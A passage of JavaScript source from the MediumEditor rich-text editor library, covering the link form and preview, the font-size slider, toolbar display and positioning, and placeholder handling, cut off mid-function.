this.base.options.buttonLabels === 'fontawesome' ? '<i class="fa fa-times"></i>' : this.formCloseLabel,
'</a>');
// both of these options are slightly moot with the ability to
// override the various form buildup/serialize functions.
if (this.base.options.anchorTarget) {
// fixme: ideally, this options.anchorInputCheckboxLabel would be a formLabel too,
// figure out how to deprecate? also consider `fa-` icon default implcations.
template.push(
'<input type="checkbox" class="medium-editor-toolbar-anchor-target">',
'<label>',
this.base.options.anchorInputCheckboxLabel,
'</label>'
);
}
if (this.base.options.anchorButton) {
// fixme: expose this `Button` text as a formLabel property, too
// and provide similar access to a `fa-` icon default.
template.push(
'<input type="checkbox" class="medium-editor-toolbar-anchor-button">',
'<label>Button</label>'
);
}
return template.join('');
},
// Used by medium-editor when the default toolbar is to be displayed
isDisplayed: function () {
return this.getForm().style.display === 'block';
},
hideForm: function () {
this.getForm().style.display = 'none';
this.getInput().value = '';
},
showForm: function (linkValue) {
var input = this.getInput();
this.base.saveSelection();
this.base.hideToolbarDefaultActions();
this.getForm().style.display = 'block';
this.base.setToolbarPosition();
input.value = linkValue || '';
input.focus();
},
// Called by core when tearing down medium-editor (deactivate)
deactivate: function () {
if (!this.form) {
return false;
}
if (this.form.parentNode) {
this.form.parentNode.removeChild(this.form);
}
delete this.form;
},
// core methods
getFormOpts: function () {
// no notion of private functions? wanted `_getFormOpts`
var targetCheckbox = this.getForm().querySelector('.medium-editor-toolbar-anchor-target'),
buttonCheckbox = this.getForm().querySelector('.medium-editor-toolbar-anchor-button'),
opts = {
url: this.getInput().value
};
if (this.base.options.checkLinkFormat) {
opts.url = this.checkLinkFormat(opts.url);
}
if (targetCheckbox && targetCheckbox.checked) {
opts.target = '_blank';
} else {
opts.target = '_self';
}
if (buttonCheckbox && buttonCheckbox.checked) {
opts.buttonClass = this.base.options.anchorButtonClass;
}
return opts;
},
doFormSave: function () {
var opts = this.getFormOpts();
this.completeFormSave(opts);
},
completeFormSave: function (opts) {
this.base.restoreSelection();
this.base.createLink(opts);
this.base.checkSelection();
},
checkLinkFormat: function (value) {
var re = /^(https?|ftps?|rtmpt?):\/\/|mailto:/;
return (re.test(value) ? '' : 'http://') + value;
},
doFormCancel: function () {
this.base.restoreSelection();
this.base.checkSelection();
},
// form creation and event handling
attachFormEvents: function (form) {
var close = form.querySelector('.medium-editor-toolbar-close'),
save = form.querySelector('.medium-editor-toolbar-save'),
input = form.querySelector('.medium-editor-toolbar-input');
// Handle clicks on the form itself
this.base.on(form, 'click', this.handleFormClick.bind(this));
// Handle typing in the textbox
this.base.on(input, 'keyup', this.handleTextboxKeyup.bind(this));
// Handle close button clicks
this.base.on(close, 'click', this.handleCloseClick.bind(this));
// Handle save button clicks (capture)
this.base.on(save, 'click', this.handleSaveClick.bind(this), true);
},
createForm: function () {
var doc = this.base.options.ownerDocument,
form = doc.createElement('div');
// Anchor Form (div)
form.className = 'medium-editor-toolbar-form';
form.id = 'medium-editor-toolbar-form-anchor-' + this.base.id;
form.innerHTML = this.getTemplate();
this.attachFormEvents(form);
return form;
},
getInput: function () {
return this.getForm().querySelector('input.medium-editor-toolbar-input');
},
handleTextboxKeyup: function (event) {
// For ENTER -> create the anchor
if (event.keyCode === Util.keyCode.ENTER) {
event.preventDefault();
this.doFormSave();
return;
}
// For ESCAPE -> close the form
if (event.keyCode === Util.keyCode.ESCAPE) {
event.preventDefault();
this.doFormCancel();
}
},
handleFormClick: function (event) {
// make sure not to hide form when clicking inside the form
event.stopPropagation();
},
handleSaveClick: function (event) {
// Clicking Save -> create the anchor
event.preventDefault();
this.doFormSave();
},
handleCloseClick: function (event) {
// Click Close -> close the form
event.preventDefault();
this.doFormCancel();
}
};
AnchorExtension = Util.derives(DefaultButton, AnchorDerived);
}());
var AnchorPreview;
(function () {
'use strict';
AnchorPreview = function () {
this.parent = true;
this.name = 'anchor-preview';
};
AnchorPreview.prototype = {
// the default selector to locate where to
// put the activeAnchor value in the preview
previewValueSelector: 'a',
init: function (instance) {
this.base = instance;
this.anchorPreview = this.createPreview();
this.base.options.elementsContainer.appendChild(this.anchorPreview);
this.attachToEditables();
},
getPreviewElement: function () {
return this.anchorPreview;
},
createPreview: function () {
var el = this.base.options.ownerDocument.createElement('div');
el.id = 'medium-editor-anchor-preview-' + this.base.id;
el.className = 'medium-editor-anchor-preview';
el.innerHTML = this.getTemplate();
this.base.on(el, 'click', this.handleClick.bind(this));
return el;
},
getTemplate: function () {
return '<div class="medium-editor-toolbar-anchor-preview" id="medium-editor-toolbar-anchor-preview">' +
' <a class="medium-editor-toolbar-anchor-preview-inner"></a>' +
'</div>';
},
deactivate: function () {
if (this.anchorPreview) {
if (this.anchorPreview.parentNode) {
this.anchorPreview.parentNode.removeChild(this.anchorPreview);
}
delete this.anchorPreview;
}
},
hidePreview: function () {
this.anchorPreview.classList.remove('medium-editor-anchor-preview-active');
this.activeAnchor = null;
},
showPreview: function (anchorEl) {
if (this.anchorPreview.classList.contains('medium-editor-anchor-preview-active') ||
anchorEl.getAttribute('data-disable-preview')) {
return true;
}
if (this.previewValueSelector) {
this.anchorPreview.querySelector(this.previewValueSelector).textContent = anchorEl.attributes.href.value;
this.anchorPreview.querySelector(this.previewValueSelector).href = anchorEl.attributes.href.value;
}
this.anchorPreview.classList.add('medium-toolbar-arrow-over');
this.anchorPreview.classList.remove('medium-toolbar-arrow-under');
if (!this.anchorPreview.classList.contains('medium-editor-anchor-preview-active')) {
this.anchorPreview.classList.add('medium-editor-anchor-preview-active');
}
this.activeAnchor = anchorEl;
this.positionPreview();
this.attachPreviewHandlers();
return this;
},
positionPreview: function () {
var buttonHeight = 40,
boundary = this.activeAnchor.getBoundingClientRect(),
middleBoundary = (boundary.left + boundary.right) / 2,
halfOffsetWidth,
defaultLeft;
halfOffsetWidth = this.anchorPreview.offsetWidth / 2;
defaultLeft = this.base.options.diffLeft - halfOffsetWidth;
this.anchorPreview.style.top = Math.round(buttonHeight + boundary.bottom - this.base.options.diffTop + this.base.options.contentWindow.pageYOffset - this.anchorPreview.offsetHeight) + 'px';
if (middleBoundary < halfOffsetWidth) {
this.anchorPreview.style.left = defaultLeft + halfOffsetWidth + 'px';
} else if ((this.base.options.contentWindow.innerWidth - middleBoundary) < halfOffsetWidth) {
this.anchorPreview.style.left = this.base.options.contentWindow.innerWidth + defaultLeft - halfOffsetWidth + 'px';
} else {
this.anchorPreview.style.left = defaultLeft + middleBoundary + 'px';
}
},
attachToEditables: function () {
this.base.subscribe('editableMouseover', this.handleEditableMouseover.bind(this));
},
handleClick: function (event) {
var anchorExtension = this.base.getExtensionByName('anchor'),
activeAnchor = this.activeAnchor;
if (anchorExtension && activeAnchor) {
event.preventDefault();
this.base.selectElement(this.activeAnchor);
// Using setTimeout + options.delay because:
// We may actually be displaying the anchor form, which should be controlled by options.delay
this.base.delay(function () {
if (activeAnchor) {
anchorExtension.showForm(activeAnchor.attributes.href.value);
activeAnchor = null;
}
}.bind(this));
}
this.hidePreview();
},
handleAnchorMouseout: function () {
this.anchorToPreview = null;
this.base.off(this.activeAnchor, 'mouseout', this.instanceHandleAnchorMouseout);
this.instanceHandleAnchorMouseout = null;
},
handleEditableMouseover: function (event) {
var target = Util.getClosestTag(event.target, 'a');
if (target) {
// Detect empty href attributes
// The browser will make href="" or href="#top"
// into absolute urls when accessed as event.targed.href, so check the html
if (!/href=["']\S+["']/.test(target.outerHTML) || /href=["']#\S+["']/.test(target.outerHTML)) {
return true;
}
// only show when hovering on anchors
if (this.base.toolbar && this.base.toolbar.isDisplayed()) {
// only show when toolbar is not present
return true;
}
// detach handler for other anchor in case we hovered multiple anchors quickly
if (this.activeAnchor && this.activeAnchor !== target) {
this.detachPreviewHandlers();
}
this.anchorToPreview = target;
this.instanceHandleAnchorMouseout = this.handleAnchorMouseout.bind(this);
this.base.on(this.anchorToPreview, 'mouseout', this.instanceHandleAnchorMouseout);
// Using setTimeout + options.delay because:
// - We're going to show the anchor preview according to the configured delay
// if the mouse has not left the anchor tag in that time
this.base.delay(function () {
if (this.anchorToPreview) {
//this.activeAnchor = this.anchorToPreview;
this.showPreview(this.anchorToPreview);
}
}.bind(this));
}
},
handlePreviewMouseover: function () {
this.lastOver = (new Date()).getTime();
this.hovering = true;
},
handlePreviewMouseout: function (event) {
if (!event.relatedTarget || !/anchor-preview/.test(event.relatedTarget.className)) {
this.hovering = false;
}
},
updatePreview: function () {
if (this.hovering) {
return true;
}
var durr = (new Date()).getTime() - this.lastOver;
if (durr > this.base.options.anchorPreviewHideDelay) {
// hide the preview 1/2 second after mouse leaves the link
this.detachPreviewHandlers();
}
},
detachPreviewHandlers: function () {
// cleanup
clearInterval(this.intervalTimer);
if (this.instanceHandlePreviewMouseover) {
this.base.off(this.anchorPreview, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.off(this.anchorPreview, 'mouseout', this.instanceHandlePreviewMouseout);
if (this.activeAnchor) {
this.base.off(this.activeAnchor, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.off(this.activeAnchor, 'mouseout', this.instanceHandlePreviewMouseout);
}
}
this.hidePreview();
this.hovering = this.instanceHandlePreviewMouseover = this.instanceHandlePreviewMouseout = null;
},
// TODO: break up method and extract out handlers
attachPreviewHandlers: function () {
this.lastOver = (new Date()).getTime();
this.hovering = true;
this.instanceHandlePreviewMouseover = this.handlePreviewMouseover.bind(this);
this.instanceHandlePreviewMouseout = this.handlePreviewMouseout.bind(this);
this.intervalTimer = setInterval(this.updatePreview.bind(this), 200);
this.base.on(this.anchorPreview, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.on(this.anchorPreview, 'mouseout', this.instanceHandlePreviewMouseout);
this.base.on(this.activeAnchor, 'mouseover', this.instanceHandlePreviewMouseover);
this.base.on(this.activeAnchor, 'mouseout', this.instanceHandlePreviewMouseout);
}
};
}());
var FontSizeExtension;
(function () {
'use strict';
function FontSizeDerived() {
this.parent = true;
this.options = {
name: 'fontsize',
action: 'fontSize',
aria: 'increase/decrease font size',
contentDefault: '±', // ±
contentFA: '<i class="fa fa-text-height"></i>'
};
this.name = 'fontsize';
this.hasForm = true;
}
FontSizeDerived.prototype = {
// Button and Extension handling
// Called when the button the toolbar is clicked
// Overrides DefaultButton.handleClick
handleClick: function (evt) {
evt.preventDefault();
evt.stopPropagation();
if (!this.isDisplayed()) {
// Get fontsize of current selection (convert to string since IE returns this as number)
var fontSize = this.base.options.ownerDocument.queryCommandValue('fontSize') + '';
this.showForm(fontSize);
}
return false;
},
// Called by medium-editor to append form to the toolbar
getForm: function () {
if (!this.form) {
this.form = this.createForm();
}
return this.form;
},
// Used by medium-editor when the default toolbar is to be displayed
isDisplayed: function () {
return this.getForm().style.display === 'block';
},
hideForm: function () {
this.getForm().style.display = 'none';
this.getInput().value = '';
},
showForm: function (fontSize) {
var input = this.getInput();
this.base.saveSelection();
this.base.hideToolbarDefaultActions();
this.getForm().style.display = 'block';
this.base.setToolbarPosition();
input.value = fontSize || '';
input.focus();
},
// Called by core when tearing down medium-editor (deactivate)
deactivate: function () {
if (!this.form) {
return false;
}
if (this.form.parentNode) {
this.form.parentNode.removeChild(this.form);
}
delete this.form;
},
// core methods
doFormSave: function () {
this.base.restoreSelection();
this.base.checkSelection();
},
doFormCancel: function () {
this.base.restoreSelection();
this.clearFontSize();
this.base.checkSelection();
},
// form creation and event handling
createForm: function () {
var doc = this.base.options.ownerDocument,
form = doc.createElement('div'),
input = doc.createElement('input'),
close = doc.createElement('a'),
save = doc.createElement('a');
// Font Size Form (div)
form.className = 'medium-editor-toolbar-form';
form.id = 'medium-editor-toolbar-form-fontsize-' + this.base.id;
// Handle clicks on the form itself
this.base.on(form, 'click', this.handleFormClick.bind(this));
// Add font size slider
input.setAttribute('type', 'range');
input.setAttribute('min', '1');
input.setAttribute('max', '7');
input.className = 'medium-editor-toolbar-input';
form.appendChild(input);
// Handle typing in the textbox
this.base.on(input, 'change', this.handleSliderChange.bind(this));
// Add save buton
save.setAttribute('href', '#');
save.className = 'medium-editor-toobar-save';
save.innerHTML = this.base.options.buttonLabels === 'fontawesome' ?
'<i class="fa fa-check"></i>' :
'✓';
form.appendChild(save);
// Handle save button clicks (capture)
this.base.on(save, 'click', this.handleSaveClick.bind(this), true);
// Add close button
close.setAttribute('href', '#');
close.className = 'medium-editor-toobar-close';
close.innerHTML = this.base.options.buttonLabels === 'fontawesome' ?
'<i class="fa fa-times"></i>' :
'×';
form.appendChild(close);
// Handle close button clicks
this.base.on(close, 'click', this.handleCloseClick.bind(this));
return form;
},
getInput: function () {
return this.getForm().querySelector('input.medium-editor-toolbar-input');
},
clearFontSize: function () {
Selection.getSelectedElements(this.base.options.ownerDocument).forEach(function (el) {
if (el.tagName === 'FONT' && el.hasAttribute('size')) {
el.removeAttribute('size');
}
});
},
handleSliderChange: function () {
var size = this.getInput().value;
if (size === '4') {
this.clearFontSize();
} else {
this.base.execAction('fontSize', { size: size });
}
},
handleFormClick: function (event) {
// make sure not to hide form when clicking inside the form
event.stopPropagation();
},
handleSaveClick: function (event) {
// Clicking Save -> create the font size
event.preventDefault();
this.doFormSave();
},
handleCloseClick: function (event) {
// Click Close -> close the form
event.preventDefault();
this.doFormCancel();
}
};
FontSizeExtension = Util.derives(DefaultButton, FontSizeDerived);
}());
var Toolbar;
(function () {
'use strict';
Toolbar = function Toolbar(instance) {
this.base = instance;
this.options = instance.options;
this.initThrottledMethods();
};
Toolbar.prototype = {
// Toolbar creation/deletion
createToolbar: function () {
var toolbar = this.base.options.ownerDocument.createElement('div');
toolbar.id = 'medium-editor-toolbar-' + this.base.id;
toolbar.className = 'medium-editor-toolbar';
if (this.options.staticToolbar) {
toolbar.className += ' static-toolbar';
} else {
toolbar.className += ' stalker-toolbar';
}
toolbar.appendChild(this.createToolbarButtons());
// Add any forms that extensions may have
this.base.commands.forEach(function (extension) {
if (extension.hasForm) {
toolbar.appendChild(extension.getForm());
}
});
this.attachEventHandlers();
return toolbar;
},
createToolbarButtons: function () {
var ul = this.base.options.ownerDocument.createElement('ul'),
li,
btn,
buttons,
extension;
ul.id = 'medium-editor-toolbar-actions' + this.base.id;
ul.className = 'medium-editor-toolbar-actions clearfix';
ul.style.display = 'block';
this.base.options.buttons.forEach(function (button) {
extension = this.base.getExtensionByName(button);
if (typeof extension.getButton === 'function') {
btn = extension.getButton(this.base);
li = this.base.options.ownerDocument.createElement('li');
if (Util.isElement(btn)) {
li.appendChild(btn);
} else {
li.innerHTML = btn;
}
ul.appendChild(li);
}
}.bind(this));
buttons = ul.querySelectorAll('button');
if (buttons.length > 0) {
buttons[0].classList.add(this.options.firstButtonClass);
buttons[buttons.length - 1].classList.add(this.options.lastButtonClass);
}
return ul;
},
deactivate: function () {
if (this.toolbar) {
if (this.toolbar.parentNode) {
this.toolbar.parentNode.removeChild(this.toolbar);
}
delete this.toolbar;
}
},
// Toolbar accessors
getToolbarElement: function () {
if (!this.toolbar) {
this.toolbar = this.createToolbar();
}
return this.toolbar;
},
getToolbarActionsElement: function () {
return this.getToolbarElement().querySelector('.medium-editor-toolbar-actions');
},
// Toolbar event handlers
initThrottledMethods: function () {
// throttledPositionToolbar is throttled because:
// - It will be called when the browser is resizing, which can fire many times very quickly
// - For some event (like resize) a slight lag in UI responsiveness is OK and provides performance benefits
this.throttledPositionToolbar = Util.throttle(function () {
if (this.base.isActive) {
this.positionToolbarIfShown();
}
}.bind(this));
},
attachEventHandlers: function () {
// MediumEditor custom events for when user beings and ends interaction with a contenteditable and its elements
this.base.subscribe('blur', this.handleBlur.bind(this));
this.base.subscribe('focus', this.handleFocus.bind(this));
// Updating the state of the toolbar as things change
this.base.subscribe('editableClick', this.handleEditableClick.bind(this));
this.base.subscribe('editableKeyup', this.handleEditableKeyup.bind(this));
// Handle mouseup on document for updating the selection in the toolbar
this.base.on(this.options.ownerDocument.documentElement, 'mouseup', this.handleDocumentMouseup.bind(this));
// Add a scroll event for sticky toolbar
if (this.options.staticToolbar && this.options.stickyToolbar) {
// On scroll (capture), re-position the toolbar
this.base.on(this.options.contentWindow, 'scroll', this.handleWindowScroll.bind(this), true);
}
// On resize, re-position the toolbar
this.base.on(this.options.contentWindow, 'resize', this.handleWindowResize.bind(this));
},
handleWindowScroll: function () {
this.positionToolbarIfShown();
},
handleWindowResize: function () {
this.throttledPositionToolbar();
},
handleDocumentMouseup: function (event) {
// Do not trigger checkState when mouseup fires over the toolbar
if (event &&
event.target &&
Util.isDescendant(this.getToolbarElement(), event.target)) {
return false;
}
this.checkState();
},
handleEditableClick: function () {
// Delay the call to checkState to handle bug where selection is empty
// immediately after clicking inside a pre-existing selection
setTimeout(function () {
this.checkState();
}.bind(this), 0);
},
handleEditableKeyup: function () {
this.checkState();
},
handleBlur: function () {
// Kill any previously delayed calls to hide the toolbar
clearTimeout(this.hideTimeout);
// Blur may fire even if we have a selection, so we want to prevent any delayed showToolbar
// calls from happening in this specific case
clearTimeout(this.delayShowTimeout);
// Delay the call to hideToolbar to handle bug with multiple editors on the page at once
this.hideTimeout = setTimeout(function () {
this.hideToolbar();
}.bind(this), 1);
},
handleFocus: function () {
this.checkState();
},
// Hiding/showing toolbar
isDisplayed: function () {
return this.getToolbarElement().classList.contains('medium-editor-toolbar-active');
},
showToolbar: function () {
clearTimeout(this.hideTimeout);
if (!this.isDisplayed()) {
this.getToolbarElement().classList.add('medium-editor-toolbar-active');
if (typeof this.options.onShowToolbar === 'function') {
this.options.onShowToolbar();
}
}
},
hideToolbar: function () {
if (this.isDisplayed()) {
this.base.commands.forEach(function (extension) {
if (typeof extension.onHide === 'function') {
extension.onHide();
}
});
this.getToolbarElement().classList.remove('medium-editor-toolbar-active');
if (typeof this.options.onHideToolbar === 'function') {
this.options.onHideToolbar();
}
}
},
isToolbarDefaultActionsDisplayed: function () {
return this.getToolbarActionsElement().style.display === 'block';
},
hideToolbarDefaultActions: function () {
if (this.isToolbarDefaultActionsDisplayed()) {
this.getToolbarActionsElement().style.display = 'none';
}
},
showToolbarDefaultActions: function () {
this.hideExtensionForms();
if (!this.isToolbarDefaultActionsDisplayed()) {
this.getToolbarActionsElement().style.display = 'block';
}
// Using setTimeout + options.delay because:
// We will actually be displaying the toolbar, which should be controlled by options.delay
this.delayShowTimeout = this.base.delay(function () {
this.showToolbar();
}.bind(this));
},
hideExtensionForms: function () {
// Hide all extension forms
this.base.commands.forEach(function (extension) {
if (extension.hasForm && extension.isDisplayed()) {
extension.hideForm();
}
});
},
// Responding to changes in user selection
// Checks for existance of multiple block elements in the current selection
multipleBlockElementsSelected: function () {
/*jslint regexp: true*/
var selectionHtml = Selection.getSelectionHtml.call(this).replace(/<[\S]+><\/[\S]+>/gim, ''),
hasMultiParagraphs = selectionHtml.match(/<(p|h[1-6]|blockquote)[^>]*>/g);
/*jslint regexp: false*/
return !!hasMultiParagraphs && hasMultiParagraphs.length > 1;
},
modifySelection: function () {
var selection = this.options.contentWindow.getSelection(),
selectionRange = selection.getRangeAt(0);
/*
* In firefox, there are cases (ie doubleclick of a word) where the selectionRange start
* will be at the very end of an element. In other browsers, the selectionRange start
* would instead be at the very beginning of an element that actually has content.
* example:
* <span>foo</span><span>bar</span>
*
* If the text 'bar' is selected, most browsers will have the selectionRange start at the beginning
* of the 'bar' span. However, there are cases where firefox will have the selectionRange start
* at the end of the 'foo' span. The contenteditable behavior will be ok, but if there are any
* properties on the 'bar' span, they won't be reflected accurately in the toolbar
* (ie 'Bold' button wouldn't be active)
*
* So, for cases where the selectionRange start is at the end of an element/node, find the next
* adjacent text node that actually has content in it, and move the selectionRange start there.
*/
if (this.options.standardizeSelectionStart &&
selectionRange.startContainer.nodeValue &&
(selectionRange.startOffset === selectionRange.startContainer.nodeValue.length)) {
var adjacentNode = Util.findAdjacentTextNodeWithContent(Selection.getSelectionElement(this.options.contentWindow), selectionRange.startContainer, this.options.ownerDocument);
if (adjacentNode) {
var offset = 0;
while (adjacentNode.nodeValue.substr(offset, 1).trim().length === 0) {
offset = offset + 1;
}
var newRange = this.options.ownerDocument.createRange();
newRange.setStart(adjacentNode, offset);
newRange.setEnd(selectionRange.endContainer, selectionRange.endOffset);
selection.removeAllRanges();
selection.addRange(newRange);
selectionRange = newRange;
}
}
},
checkState: function () {
if (!this.base.preventSelectionUpdates) {
// If no editable has focus OR selection is inside contenteditable = false
// hide toolbar
if (!this.getFocusedElement() ||
Selection.selectionInContentEditableFalse(this.options.contentWindow)) {
this.hideToolbar();
return;
}
// If there's no selection element, selection element doesn't belong to this editor
// or toolbar is disabled for this selection element
// hide toolbar
var selectionElement = Selection.getSelectionElement(this.options.contentWindow);
if (!selectionElement ||
this.base.elements.indexOf(selectionElement) === -1 ||
selectionElement.getAttribute('data-disable-toolbar')) {
this.hideToolbar();
return;
}
// Now we know there's a focused editable with a selection
// If the updateOnEmptySelection option is true, show the toolbar
if (this.options.updateOnEmptySelection && this.options.staticToolbar) {
this.showAndUpdateToolbar();
return;
}
// If we don't have a 'valid' selection -> hide toolbar
if (this.options.contentWindow.getSelection().toString().trim() === '' ||
(this.options.allowMultiParagraphSelection === false && this.multipleBlockElementsSelected())) {
this.hideToolbar();
} else {
this.showAndUpdateToolbar();
}
}
},
getFocusedElement: function () {
for (var i = 0; i < this.base.elements.length; i += 1) {
if (this.base.elements[i].getAttribute('data-medium-focused')) {
return this.base.elements[i];
}
}
return null;
},
// Updating the toolbar
showAndUpdateToolbar: function () {
this.modifySelection();
this.setToolbarButtonStates();
this.showToolbarDefaultActions();
this.setToolbarPosition();
},
setToolbarButtonStates: function () {
this.base.commands.forEach(function (extension) {
if (typeof extension.isActive === 'function' &&
typeof extension.setInactive === 'function') {
extension.setInactive();
}
}.bind(this));
this.checkActiveButtons();
},
checkActiveButtons: function () {
var manualStateChecks = [],
queryState = null,
selectionRange = Util.getSelectionRange(this.options.ownerDocument),
parentNode,
updateExtensionState = function (extension) {
if (typeof extension.checkState === 'function') {
extension.checkState(parentNode);
} else if (typeof extension.isActive === 'function' &&
typeof extension.isAlreadyApplied === 'function' &&
typeof extension.setActive === 'function') {
if (!extension.isActive() && extension.isAlreadyApplied(parentNode)) {
extension.setActive();
}
}
};
if (!selectionRange) {
return;
}
parentNode = Selection.getSelectedParentElement(selectionRange);
// Loop through all commands
this.base.commands.forEach(function (command) {
// For those commands where we can use document.queryCommandState(), do so
if (typeof command.queryCommandState === 'function') {
queryState = command.queryCommandState();
// If queryCommandState returns a valid value, we can trust the browser
// and don't need to do our manual checks
if (queryState !== null) {
if (queryState && typeof command.setActive === 'function') {
command.setActive();
}
return;
}
}
// We can't use queryCommandState for this command, so add to manualStateChecks
manualStateChecks.push(command);
});
// Climb up the DOM and do manual checks for whether a certain command is currently enabled for this node
while (parentNode.tagName !== undefined && Util.parentElements.indexOf(parentNode.tagName.toLowerCase) === -1) {
manualStateChecks.forEach(updateExtensionState);
// we can abort the search upwards if we leave the contentEditable element
if (this.base.elements.indexOf(parentNode) !== -1) {
break;
}
parentNode = parentNode.parentNode;
}
},
// Positioning toolbar
positionToolbarIfShown: function () {
if (this.isDisplayed()) {
this.setToolbarPosition();
}
},
setToolbarPosition: function () {
var container = this.getFocusedElement(),
selection = this.options.contentWindow.getSelection(),
anchorPreview;
// If there isn't a valid selection, bail
if (!container) {
return this;
}
if (this.options.staticToolbar) {
this.showToolbar();
this.positionStaticToolbar(container);
} else if (!selection.isCollapsed) {
this.showToolbar();
this.positionToolbar(selection);
}
anchorPreview = this.base.getExtensionByName('anchor-preview');
if (anchorPreview && typeof anchorPreview.hidePreview === 'function') {
anchorPreview.hidePreview();
}
},
positionStaticToolbar: function (container) {
// position the toolbar at left 0, so we can get the real width of the toolbar
this.getToolbarElement().style.left = '0';
// document.documentElement for IE 9
var scrollTop = (this.options.ownerDocument.documentElement && this.options.ownerDocument.documentElement.scrollTop) || this.options.ownerDocument.body.scrollTop,
windowWidth = this.options.contentWindow.innerWidth,
toolbarElement = this.getToolbarElement(),
containerRect = container.getBoundingClientRect(),
containerTop = containerRect.top + scrollTop,
containerCenter = (containerRect.left + (containerRect.width / 2)),
toolbarHeight = toolbarElement.offsetHeight,
toolbarWidth = toolbarElement.offsetWidth,
halfOffsetWidth = toolbarWidth / 2,
targetLeft;
if (this.options.stickyToolbar) {
// If it's beyond the height of the editor, position it at the bottom of the editor
if (scrollTop > (containerTop + container.offsetHeight - toolbarHeight)) {
toolbarElement.style.top = (containerTop + container.offsetHeight - toolbarHeight) + 'px';
toolbarElement.classList.remove('sticky-toolbar');
// Stick the toolbar to the top of the window
} else if (scrollTop > (containerTop - toolbarHeight)) {
toolbarElement.classList.add('sticky-toolbar');
toolbarElement.style.top = '0px';
// Normal static toolbar position
} else {
toolbarElement.classList.remove('sticky-toolbar');
toolbarElement.style.top = containerTop - toolbarHeight + 'px';
}
} else {
toolbarElement.style.top = containerTop - toolbarHeight + 'px';
}
if (this.options.toolbarAlign === 'left') {
targetLeft = containerRect.left;
} else if (this.options.toolbarAlign === 'center') {
targetLeft = containerCenter - halfOffsetWidth;
} else if (this.options.toolbarAlign === 'right') {
targetLeft = containerRect.right - toolbarWidth;
}
if (targetLeft < 0) {
targetLeft = 0;
} else if ((targetLeft + toolbarWidth) > windowWidth) {
targetLeft = (windowWidth - Math.ceil(toolbarWidth) - 1);
}
toolbarElement.style.left = targetLeft + 'px';
},
positionToolbar: function (selection) {
// position the toolbar at left 0, so we can get the real width of the toolbar
this.getToolbarElement().style.left = '0';
var windowWidth = this.options.contentWindow.innerWidth,
range = selection.getRangeAt(0),
boundary = range.getBoundingClientRect(),
middleBoundary = (boundary.left + boundary.right) / 2,
toolbarElement = this.getToolbarElement(),
toolbarHeight = toolbarElement.offsetHeight,
toolbarWidth = toolbarElement.offsetWidth,
halfOffsetWidth = toolbarWidth / 2,
buttonHeight = 50,
defaultLeft = this.options.diffLeft - halfOffsetWidth;
if (boundary.top < buttonHeight) {
toolbarElement.classList.add('medium-toolbar-arrow-over');
toolbarElement.classList.remove('medium-toolbar-arrow-under');
toolbarElement.style.top = buttonHeight + boundary.bottom - this.options.diffTop + this.options.contentWindow.pageYOffset - toolbarHeight + 'px';
} else {
toolbarElement.classList.add('medium-toolbar-arrow-under');
toolbarElement.classList.remove('medium-toolbar-arrow-over');
toolbarElement.style.top = boundary.top + this.options.diffTop + this.options.contentWindow.pageYOffset - toolbarHeight + 'px';
}
if (middleBoundary < halfOffsetWidth) {
toolbarElement.style.left = defaultLeft + halfOffsetWidth + 'px';
} else if ((windowWidth - middleBoundary) < halfOffsetWidth) {
toolbarElement.style.left = windowWidth + defaultLeft - halfOffsetWidth + 'px';
} else {
toolbarElement.style.left = defaultLeft + middleBoundary + 'px';
}
}
};
}());
var Placeholders;
(function () {
'use strict';
Placeholders = function (instance) {
this.base = instance;
this.initPlaceholders();
this.attachEventHandlers();
};
Placeholders.prototype = {
initPlaceholders: function () {
this.base.elements.forEach(function (el) {
this.updatePlaceholder(el);
}, this);
},
showPlaceholder: function (el) {
if (el) {
el.classList.add('medium-editor-placeholder');
}
},
hidePlaceholder: function (el) {
if (el) {
el.classList.remove('medium-editor-placeholder');
}
},
updatePlaceholder: function (el) {
if (!(el.querySelector('img')) &&
!(el.querySelector('blockquote')) &&
el.textContent.replace(/^\s+|\s+$/g, '') === '') {
this.showPlaceholder(el);
} else {
this.hidePlaceholder(el);
}
},
attachEventHandlers: function () {
// Custom events
this.base.subscribe('blur', this.handleExternalInteraction.bind(this));
// Check placeholder on blur
this.base.subscribe('editableBlur', this.handleBlur.bind(this));
// Events where we always hide the placeholder
this.base.subscribe('editableClick', this.handleHidePlaceholderEvent.bind(this));
this.base.subscribe('editableKeypress', this.handleHidePlaceholderEvent.bind(this));
this.base.subscribe('editablePaste', this.handleHidePlaceholderEvent.bind(this));
},
handleHidePlaceholderEvent: function (event, element) {
// Events where we hide the placeholder
this.hidePlaceholder(element);
},
handleBlur: function (event, element) {
// Update placeholder for element that lost focus
this.updatePlaceholder(element);
},
handleExternalInteraction: function () {
// Update all placeholders
this.initPlaceholders();
}
};
}());
var extensionDefaults;
(function () {
// for now this is empty because nothing interally uses an Extension default.
// as they are converted, provide them here.
extensionDefaults = {
paste: PasteHandler
};
})();
function MediumEditor(elements, options) {
'use strict';
return this.init(elements, options);
}
(function () {
'use strict';
// Event handlers that shouldn't be exposed externally
function handleDisabledEnterKeydown(event, element) {
if (this.options.disableReturn || element.getAttribute('data-disable-return')) {
event.preventDefault();
} else if (this.options.disableDoubleReturn || this.getAttribute('data-disable-double-return')) {
var node = Util.getSelectionStart(this.options.ownerDocument);
if (node && node.textContent.trim() === '') {
event.preventDefault();
}
}
}
function handleTabKeydown(event) {
// Override tab only for pre nodes
var node = Util.getSelectionStart(this.options.ownerDocument),
tag = node && node.tagName.toLowerCase();
if (tag === 'pre') {
event.preventDefault();
Util.insertHTMLCommand(this.options.ownerDocument, ' ');
}
// Tab to indent list structures!
if (Util.isListItem(node)) {
event.preventDefault();
// If Shift is down, outdent, otherwise indent
if (event.shiftKey) {
this.options.ownerDocument.execCommand('outdent', false, null);
} else {
this.options.ownerDocument.execCommand('indent', false, null);
}
}
}
function handleBlockDeleteKeydowns(event) {
var range, sel, p, node = Util.getSelectionStart(this.options.ownerDocument),
tagName = node.tagName.toLowerCase(),
isEmpty = /^(\s+|<br\/?>)?$/i,
isHeader = /h\d/i;
if ((event.which === Util.keyCode.BACKSPACE || event.which === Util.keyCode.ENTER) &&
// has a preceeding sibling
node.previousElementSibling &&
// in a header
isHeader.test(tagName) &&
// at the very end of the block
Selection.getCaretOffsets(node).left === 0) {
if (event.which === Util.keyCode.BACKSPACE && isEmpty.test(node.previousElementSibling.innerHTML)) {
// backspacing the begining of a header into an empty previous element will
// change the tagName of the current node to prevent one
